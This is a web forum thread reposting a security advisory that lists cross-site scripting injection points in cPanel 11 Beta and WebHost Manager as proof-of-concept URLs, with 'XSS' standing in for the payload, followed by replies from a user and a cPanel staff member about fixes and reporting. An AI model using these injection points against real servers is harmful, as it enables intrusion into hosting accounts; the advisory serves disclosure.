CPanel 11 Beta Multiple Cross-Site Scripting

E

ehostcoua

Registered
Nov 4, 2006
1
0
151
#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#-----------------------------------------------------------
#Software: CPanel
#Tested On CPanel 11 Beta
#Poc:
#
http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS
http://target:2082/frontend/x/files/createdir.html?dir=XSS
http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss
http://target:2082/frontend/x/err/erredit.html?dir=XSS
http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
http://target:2082/frontend/x/files/createfile.html?dir=XSS
#
#P.S : Attacker must be authenticated
#
#Contact: [email protected]




#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#Original Advisory:
#http://www.aria-security.com/forum/showthread.php?t=44
#-----------------------------------------------------------
#Software: WebHost Manager (WHM)
#Tested WHM X v3.1.0 (demo.cpanel.net)
#Poc:
#
http://target:2086/scripts2/dochangeemail?user=demo&domain=demo.com&email=XSS
http://target:2086/cgi/addon_config...layusersubject=1&type=redirect&supporturl=XSS
http://target:2086/scripts/editpkg?pkg=XSS
http://target2086/scripts2/domts2?domain=XSS
http://target:2086/scripts/editzone?domain=XSS
http://target:2086/scripts2/dofeaturemanager?action=addfeature&feature=XSS
http://target:2086/scripts/park?domain=demo.com&ndomain=XSS
#
#P.S : Attacker must be authenticated
#
#Contact: [email protected]
 
C

carluk

Well-Known Member
Sep 2, 2003
161
0
166
It's in edge at the moment as far as I can see. These problems are being fixed when reported (see change log) although worrying that they are there in the first place. Security is an especially high priority at cpanel given the recent problems according to a recent post by a cpanel guy on WHT - give that what authority you will.

It should also be noted that people in glass houses should not throw stones. :)
 
cPanelDavidG

cPanelDavidG

Technical Product Specialist
Nov 29, 2006
11,212
13
313
Houston, TX
cPanel Access Level
Root Administrator
Security is a top priority here at cPanel and I would encourage anyone who stumbles across any security issues (not just XSS vulnerabilities) to submit them to [email protected]

In defense of the development team, I do know that they frequently look at and act upon reports from those particular websites. It is also important to note that cPanel 11 is not yet intended for production systems. If it was, we would be pushing the update out VIA Layer2 to upgrade everyone automatically (who has cPanel automatic update enabled).

It's better to be sterilizing cPanel 11 of security flaws now than when it hits production environments.
 
You must log in or register to reply here.
Thread starter Similar threads Forum Replies Date
B In Progress CPANEL-42515 - PCI Scan complaint about Web Server Predictable Session ID Vulnerability with port 2087 / tcp over ssl Security 5
I command line password generator from the whm/cpanel UI Security 1
I SOLVED CPANEL-42469 - New cPanel installs ModSec Tools Hits empty/stopped Security 8
W In Progress CPANEL-42410 - ClamAV CVE-2023-20032 & CVE-2023-20052, RCE with 9.8 CVSS Security 3
Ekushey Block cPanel and WHM access Security 3
Similar threads
In Progress CPANEL-42515 - PCI Scan complaint about Web Server Predictable Session ID Vulnerability with port 2087 / tcp over ssl
command line password generator from the whm/cpanel UI
SOLVED CPANEL-42469 - New cPanel installs ModSec Tools Hits empty/stopped
In Progress CPANEL-42410 - ClamAV CVE-2023-20032 & CVE-2023-20052, RCE with 9.8 CVSS
Block cPanel and WHM access
Top Bottom